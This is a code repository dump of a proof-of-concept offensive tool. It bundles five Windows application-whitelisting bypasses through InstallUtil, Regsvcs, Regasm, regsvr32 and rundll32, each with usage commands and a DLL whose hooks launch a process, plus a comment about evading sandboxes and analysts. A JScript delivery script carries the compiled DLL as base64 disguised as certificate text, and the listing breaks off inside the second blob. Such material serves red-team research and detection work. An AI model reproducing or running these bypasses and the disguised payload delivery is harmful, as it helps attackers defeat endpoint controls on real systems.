17 | Includes 5 Known Application Whitelisting/ Application Control Bypass Techiniques in One File.
18 | 1. InstallUtil.exe
19 | 2. Regsvcs.exe
20 | 3. Regasm.exe
21 | 4. regsvr32.exe
22 | 5. rundll32.exe
23 |
24 |
25 |
26 | Usage:
27 | 1.
28 | x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
29 | x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
30 | 2.
31 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
32 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
33 | 3.
34 | x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
35 | x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
36 |
37 | 4.
38 | regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
39 | regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
40 | 5.
41 | rundll32 AllTheThings.dll,EntryPoint
42 |
43 | */
44 |
45 | [assembly: ApplicationActivation(ActivationOption.Server)]
46 | [assembly: ApplicationAccessControl(false)]
47 |
48 | public class Program
49 | {
50 | public static void Main()
51 | {
52 | Console.WriteLine("Hello From Main...I Don't Do Anything");
53 | //Add any behaviour here to throw off sandbox execution/analysts :)
54 | }
55 |
56 | }
57 |
58 | public class Thing0
59 | {
60 | public static void Exec()
61 | {
62 | ProcessStartInfo startInfo = new ProcessStartInfo();
63 | startInfo.FileName = "calc.exe";
64 | Process.Start(startInfo);
65 | }
66 | }
67 |
68 | [System.ComponentModel.RunInstaller(true)]
69 | public class Thing1 : System.Configuration.Install.Installer
70 | {
71 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
72 | public override void Uninstall(System.Collections.IDictionary savedState)
73 | {
74 |
75 | Console.WriteLine("Hello There From Uninstall");
76 | Thing0.Exec();
77 |
78 | }
79 |
80 | }
81 |
82 | [ComVisible(true)]
83 | [Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
84 | [ClassInterface(ClassInterfaceType.None)]
85 | [ProgId("dllguest.Bypass")]
86 | [Transaction(TransactionOption.Required)]
87 | public class Bypass : ServicedComponent
88 | {
89 | public Bypass() { Console.WriteLine("I am a basic COM Object"); }
90 |
91 | [ComRegisterFunction] //This executes if registration is successful
92 | public static void RegisterClass(string key)
93 | {
94 | Console.WriteLine("I shouldn't really execute");
95 | Thing0.Exec();
96 | }
97 |
98 | [ComUnregisterFunction] //This executes if registration fails
99 | public static void UnRegisterClass(string key)
100 | {
101 | Console.WriteLine("I shouldn't really execute either.");
102 | Thing0.Exec();
103 | }
104 |
105 | public void Exec() { Thing0.Exec(); }
106 | }
107 |
108 | class Exports
109 | {
110 |
111 | //
112 | //
113 | //rundll32 entry point
114 | [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
115 | public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
116 | {
117 | Thing0.Exec();
118 | }
119 | [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
120 | public static void DllRegisterServer()
121 | {
122 | Thing0.Exec();
123 | }
124 | [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
125 | public static void DllUnregisterServer()
126 | {
127 | Thing0.Exec();
128 | }
129 |
130 |
131 |
132 | }
133 |
--------------------------------------------------------------------------------
/packages/UnmanagedExports.1.2.7/tools/RGiesecke.DllExport.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | $(PostBuildEventDependsOn);
7 | RGieseckeDllExport
8 |
9 |
10 |
11 |
12 |
13 | $(BuildDependsOn);
14 | RGieseckeDllExport
15 |
16 |
17 |
18 |
20 |
21 |
23 |
24 |
34 |
35 |
36 |
37 | RGiesecke.DllExport.DllExportAttribute
38 | RGiesecke.DllExport.Metadata
39 |
40 | $(Platform)
41 | $(PlatformTarget)
42 | $(CpuType)
43 | $(DebugSymbols)
44 | false
45 | $(DllExportTimeout)
46 | $(KeyContainerName)$(AssemblyKeyContainerName)
47 | $(KeyOriginatorFile)
48 | $(MSBuildProjectDirectory)
49 | $(TargetPath)
50 | $(TargetedFrameworkDir);$(TargetFrameworkDirectory)
51 | $(DevEnvDir)\..\..\VC\bin
52 | $(DevEnvDir)
53 | $(TargetFrameworkVersion)
54 | $(TargetFrameworkSDKToolsDirectory)
55 | $(NoDllExportsForAnyCpu)
56 |
57 |
58 |
74 |
75 |
--------------------------------------------------------------------------------
/AllTheThings/AllTheThings.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {0547FF40-5255-42A2-BEB7-2FF0DBF7D3BA}
8 | Library
9 | Properties
10 | AllTheThings
11 | AllTheThings
12 | v4.5.2
13 | 512
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | prompt
42 | MinimumRecommendedRules.ruleset
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | prompt
52 | MinimumRecommendedRules.ruleset
53 | true
54 |
55 |
56 | true
57 | bin\x86\Debug\
58 | DEBUG;TRACE
59 | full
60 | x86
61 | prompt
62 | MinimumRecommendedRules.ruleset
63 | true
64 |
65 |
66 | bin\x86\Release\
67 | TRACE
68 | true
69 | pdbonly
70 | x86
71 | prompt
72 | MinimumRecommendedRules.ruleset
73 | true
74 |
75 |
76 |
77 |
78 |
79 | true
80 |
81 |
82 | key.snk
83 |
84 |
85 |
86 | ..\packages\UnmanagedExports.1.2.7\lib\net\RGiesecke.DllExport.Metadata.dll
87 | False
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
118 |
--------------------------------------------------------------------------------
/JsDelivery.js:
--------------------------------------------------------------------------------
1 |
2 | var fsoForReading = 1;
3 | var fsoForWriting = 2;
4 | // Reference MSDN https://msdn.microsoft.com/en-us/library/aa265347(v=vs.60).aspx
5 |
6 | function LoadStringFromFile(filename)
7 | {
8 | var fso, f, data;
9 | fso = new ActiveXObject("Scripting.FileSystemObject");
10 | f = fso.OpenTextFile(filename, fsoForReading, true);
11 | data = f.ReadAll();
12 | f.Close();
13 | return data;
14 | }
15 |
16 | function SaveStringToFile(filename, textString)
17 | {
18 | var fso, f;
19 | fso = new ActiveXObject("Scripting.FileSystemObject");
20 | f = fso.OpenTextFile(filename, fsoForWriting, true); //Create File If It Dooesn't Exist
21 | f.Write(textString);
22 | f.Close();
23 | }
24 |
25 | // Example File Prep
26 | // Output of 'certuil.exe /encode AllTheThingsx64.dll AllTheThingsx64.txt
27 | // Why bother writing a shitty Base64 encode/decode routine, when certutil.exe will do it for you.
28 | //
29 | var x86dllEncoded = "-----BEGIN CERTIFICATE-----\
30 | TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
31 | AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
32 | dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAOHMhlcAAAAA\
33 | AAAAAOAAAiELAQsAABAAAAAIAAAAAAAAri8AAAAgAAAAQAAAAAAAEAAgAAAAAgAA\
34 | BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA4lMAAAMAQIUAABAAABAAAAAAEAAAEAAA\
35 | AAAAABAAAAAQQAAAKAAAAFwvAABPAAAAAGAAAJgDAAAAAAAAAAAAAAAAAAAAAAAA\
36 | AIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
37 | AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA\
38 | tA8AAAAgAAAAEAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAALUAAAAAQAAA\
39 | AAIAAAAUAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAACYAwAAAGAAAAAEAAAAFgAA\
40 | AAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAFAAAAACAAAAAAgAAABoAAAAAAAAAAAAA\
41 | AAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
42 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
43 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
44 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
45 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
46 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
47 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
48 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
49 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
50 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
51 | AAAAAAAAAAAAAAAAAAAAAJAvAAAAAAAASAAAAAIABQCkIQAAcA0AAAoAAAAAAAAA\
52 | AAAAAAAAAABQIAAAgAAAAAAAAAAAAAAAVC8AAAgAAAAAAAAAAAAAAAAAAAAAAAAA\
53 | hIHoDzXS4EVt+OmRj4KK22zFVcxh8Z1crHcneIMoVmI11LDX84GEziV5BMQfeojp\
54 | dugMDMrx7G2nUlsVQF6HMm961gFcNSrMcWokfoifYBZXqsXoUkE4fOqEMyqH4xol\
55 | nZnusiIxOIjDDOokb20LnrrfWncFOXsHUnTWPEtTUzwucgEAAHAoEAAACioeAigR\
56 | AAAKKl5zEgAACiVyTQAAcG8TAAAKKBQAAAomKh4CKBEAAAoqQnJfAABwKBAAAAoo\
57 | AwAABioeAigWAAAKKkYCKBoAAApylQAAcCgQAAAKKkJyxQAAcCgQAAAKKAMAAAYq\
58 | QnL7AABwKBAAAAooAwAABioaKAMAAAYqGigDAAAGKhooAwAABioaKAMAAAYqGigD\
59 | AAAGKh4CKBEAAAoqOgIoEQAACgIWfQEAAAQqWnJBAQBwAnsBAAAEjCEAAAEoHQAA\
60 | CioAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAEQEAAAjfgAA\
61 | sAQAAOwEAAAjU3RyaW5ncwAAAACcCQAAYAEAACNVUwD8CgAAEAAAACNHVUlEAAAA\
62 | DAsAAGQCAAAjQmxvYgAAAAAAAAACAAABVxUAAAkAAAAA+iUzABYAAAEAAAAiAAAA\
63 | BwAAAAEAAAARAAAABwAAAB0AAAAZAAAAAQAAAAQAAAAAAN0DAQAAAAAABgAqAAoA\
64 | BgBQAAoACgCIAG4ACgCnAG4ACgC4AG4ABgDsANoABgADAdoABgAgAdoABgA/AdoA\
65 | BgBYAdoABgBxAdoABgCMAdoABgDGAacBBgDaAacBBgDoAdoABgAfAgUCBgA/AjgC\
66 | BgBGAjgCDgBrAlgCDgCJAlgCEgC0ApcCDgDUAr4CBgD9AuoCCgAJA24ABgAbA6cB\
67 | BgAzA6cBBgBGA6cBCgBWA24ACgBrA24ABgB9A6cBBgCaA6cBBgC5AwoABgDJAzgC\
68 | BgDPAzgCAAAAAAEAAAAAAAEAAQABABAA9wMAAEUAAQABAAEAEAD/AwAARQABAAMA\
69 | AQAQAAYEAABVAAEABQABABAADQQAAGEAAQAHAAAAEAAUBAAARQABAAsAAQAQABwE\
70 | IgRFAAEAEAAGAM0E1ADQIAAAAACWACkEswABANwgAAAAAIYYSgAGAAEA5CAAAAAA\
71 | lgAuBLMAAQD8IAAAAACGGEoABgABAAQhAAAAAMYAMwS3AAEAFSEAAAAAhhhKAAYA\
72 | AgAdIQAAAACGGEoABgACAC8hAAAAAJYASAQaAAIAQCEAAAAAlgBaBBoAAwBRIQAA\
73 | AACGAC4EBgAEAFghAAAAAJYAagTCAAQAXyEAAAAAlgCVBM0ACABmIQAAAACWAKcE\
74 | zQAIAG0hAAAAAJYAuwTNAAgAdCEAAAAAhhhKAAYACAB8IQAAAACGGEoABgAIAIsh\
75 | AAAAAIYA0QTXAAgAAAABAD0EAAABAFYEAAABAFYEAAABAHUEAAACAHoEAAADAIAE\
76 | AAAEAIwECQBKAAEAEQBKAAYAGQBKAAoAKQBKABAAMQBKABUAOQBKABUAQQBKABUA\
77 | SQBKABUAUQBKABUAWQBKABUAYQBKABUAaQBKABAAcQBKABUAeQBKABUAgQBKABUA\
78 | kQBOAhoAiQBKAAYAmQBKAAYAmQB8AhUAoQCRAh8AsQBKABAAqQBKAAYAyQBKACYA\
79 | 2QBKABUA4QBKACwAwQBKAAYA8QBKAAYA+QBKAAYAEQHWAzIALgAbAKUBLgB7ABUC\
80 | LgALAH0BLgATAIYBLgAjAK4BLgArALQBLgAzAK4BLgA7AK4BLgBDAK4BLgBLALQB\
81 | LgBTAMYBLgBbAK4BLgBjAK4BLgBrAN4BLgBzAAgCgwCrAEoAowC7AHoAowDLAJgA\
82 | owBrAFAAowBjAEoAowDDAIMA4wDDAKEA4wBjAEoAAAHbAL0AIAHjAL0ABIAAAAEA\
83 | AAAAAAAAAQAAANsA3AQAAAQAAAAAAAAAAAAAADgA7gMAAAAABAAAAAAAAAAAAAAA\
84 | QQBuAAAAAAAEAAAAAAAAAAAAAAA4ADgCAAAAAAQAAAAAAAAAAAAAAEEAlwIAAAAA\
85 | AAAAAAA8TW9kdWxlPgBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAENv\
86 | bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUALmN0b3IAUnVudGltZUNvbXBh\
87 | dGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkVudGVycHJpc2VTZXJ2aWNlcwBBcHBs\
88 | aWNhdGlvbkFjdGl2YXRpb25BdHRyaWJ1dGUAQWN0aXZhdGlvbk9wdGlvbgBBcHBs\
89 | aWNhdGlvbkFjY2Vzc0NvbnRyb2xBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24A\
90 | QXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmli\
91 | dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBh\
92 | bnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29w\
93 | eXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFN5c3Rl\
94 | bS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1\
95 | aWRBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTeXN0ZW0u\
96 | UnVudGltZS5WZXJzaW9uaW5nAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBTeXN0\
97 | ZW0AT2JqZWN0AENvbnNvbGUAV3JpdGVMaW5lAFN5c3RlbS5EaWFnbm9zdGljcwBQ\
98 | cm9jZXNzU3RhcnRJbmZvAHNldF9GaWxlTmFtZQBQcm9jZXNzAFN0YXJ0AFN5c3Rl\
99 | bS5Db25maWd1cmF0aW9uLkluc3RhbGwASW5zdGFsbGVyAFN5c3RlbS5Db21wb25l\
100 | bnRNb2RlbABSdW5JbnN0YWxsZXJBdHRyaWJ1dGUAU3lzdGVtLkNvbGxlY3Rpb25z\
101 | AElEaWN0aW9uYXJ5AFNlcnZpY2VkQ29tcG9uZW50AENsYXNzSW50ZXJmYWNlQXR0\
102 | cmlidXRlAENsYXNzSW50ZXJmYWNlVHlwZQBQcm9nSWRBdHRyaWJ1dGUAVHJhbnNh\
103 | Y3Rpb25BdHRyaWJ1dGUAVHJhbnNhY3Rpb25PcHRpb24AQ29tUmVnaXN0ZXJGdW5j\
104 | dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAQ2Fs\
105 | bENvbnZTdGRjYWxsAEludDMyAFN0cmluZwBGb3JtYXQAQWxsVGhlVGhpbmdzLmRs\
106 | bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
107 | VGhpbmcAc3ViVGVlAE1haW4ARXhlYwBVbmluc3RhbGwAc2F2ZWRTdGF0ZQBSZWdp\
108 | c3RlckNsYXNzAGtleQBVblJlZ2lzdGVyQ2xhc3MARW50cnlQb2ludABod25kAGhp\
109 | bnN0AGxwc3pDbWRMaW5lAG5DbWRTaG93AERsbFJlZ2lzdGVyU2VydmVyAERsbFVu\
110 | cmVnaXN0ZXJTZXJ2ZXIARGxsR2V0Q2xhc3NPYmplY3QATnVtAEdldE1lc3NhZ2UA\
111 | QWxsVGhlVGhpbmdzAAAAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
112 | LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
113 | YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
114 | IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
115 | QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
116 | ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
117 | dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
118 | AR1OAHUAbQBiAGUAcgAgAGkAcwAgAHsAMAB9AC4AAAAJ8Vav4FuUQL1vc2zseC4f\
119 | AAQgAQEIAyAAAQUgAQEREQQgAQECBCABAQ4EAAEBDgYAARJREk0FIAEBEWkFIAEB\
120 | EXUFAAIODhwIt3pcVhk04IkIsD9ffxHVCjoFAQABAAApAQAkMzFEMkI5NjktNzYw\
121 | OC00MjZFLTlEOEUtQTA5RkM5QTUxNjgwAAAIAQAAAAAAAAAUAQAPZGxsZ3Vlc3Qu\
122 | QnlwYXNzAAAIAQADAAAAAAARAQAMc3VidGVlLlRoaW5nAAADAAABBSABARJdBAEA\
123 | AAAKAAQggIEBGBgOCAYAACCAgQECBggDIAAOgKAAJAAABIAAAJQAAAAGAgAAACQA\
124 | AFJTQTEABAAAAQABAAtBHWB3pyShpMmhh27dNvN38y6duzRQR/TmciyPJ/h+88d8\
125 | BKkPZiL05SqFUOiem1RA1clLPfQDGGkN6RW9A/Ox3ZRd3Wq4fbyuaEKH0wj1jvR6\
126 | NuTVSrVWdrM6PVDUpk9il+KRtY2aI/wshNozZdDlMONgVSgn/gvEND9mrNizCAEA\
127 | CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAEAAAAAAAUB\
128 | AAAAABEBAAxBbGxUaGVUaGluZ3MAABcBABJDb3B5cmlnaHQgwqkgIDIwMTYAACkB\
129 | ACQwNTQ3ZmY0MC01MjU1LTQyYTItYmViNy0yZmYwZGJmN2QzYmEAAAwBAAcxLjAu\
130 | MC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3\
131 | b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIAAAAAAAAAAAAAAP8l\
132 | AEAAEAAAAAAAAAAAAAD/JQRAABAAAAAAAAAAAAAA/yUIQAAQAAAAAAAAAAAAAP8l\
133 | DEAAEABAAAAEAAUAhC8AAAAAAAAAAAAAni8AAAAgAAAAAAAAAAAAAAAAAAAAAAAA\
134 | AAAAAJAvAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8l\
135 | ACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
136 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGDAAABg0AAAYOAAAG\
137 | AAAAAOHMhlcAAAAAo0AAAAAAAAAEAAAABAAAADhAAABIQAAAWEAAAB4vAAAuLwAA\
138 | Pi8AAE4vAABgQAAAckAAAIRAAACYQAAAAwABAAIAAABEbGxHZXRDbGFzc09iamVj\
139 | dABEbGxSZWdpc3RlclNlcnZlcgBEbGxVbnJlZ2lzdGVyU2VydmVyAEVudHJ5UG9p\
140 | bnQAXEFsbFRoZVRoaW5ncy5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
141 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
142 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
143 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
144 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
145 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
146 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
147 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
148 | AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
149 | AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
150 | vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
151 | AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
152 | bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
153 | ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
154 | bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
155 | AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
156 | bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
157 | bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
158 | YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
159 | AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
160 | dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
161 | YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
162 | YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
163 | AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
164 | ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
165 | MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
166 | bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
167 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
168 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACA/MD9AP1A/\
169 | sD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
170 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
171 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
172 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
173 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
174 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
175 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
176 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
177 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
178 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
179 | AAAAAAAAAAAAAAAAAAAAAA==\
180 | -----END CERTIFICATE-----"
181 |
182 |
183 | var x64dllEncoded = "-----BEGIN CERTIFICATE-----\
184 | TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
185 | AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
186 | dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYEALx/flcAAAAA\
187 | AAAAAPAAIiALAgsAABAAAAAIAAAAAAAAni4AAAAgAAAAAACAAQAAAAAgAAAAAgAA\
188 | BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA3jMAAAMAQIUAAEAAAAAAAABAAAAAAAAA\
189 | AAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAGEAAACgAAABILgAAUwAAAABgAACYAwAA\
190 | AAAAAAAAAAAAAAAAAAAAAACAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
191 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAABAAAAAAAAAAAAAAABAgAABIAAAA\
192 | AAAAAAAAAAAudGV4dAAAAKoOAAAAIAAAABAAAAAEAAAAAAAAAAAAAAAAAAAgAABg\
193 | LnNkYXRhAAChAAAAAEAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA\
194 | mAMAAABgAAAABAAAABYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAABAAAAAAgAAA\
195 | AAIAAAAaAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
196 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
197 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
198 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
199 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
200 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
201 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
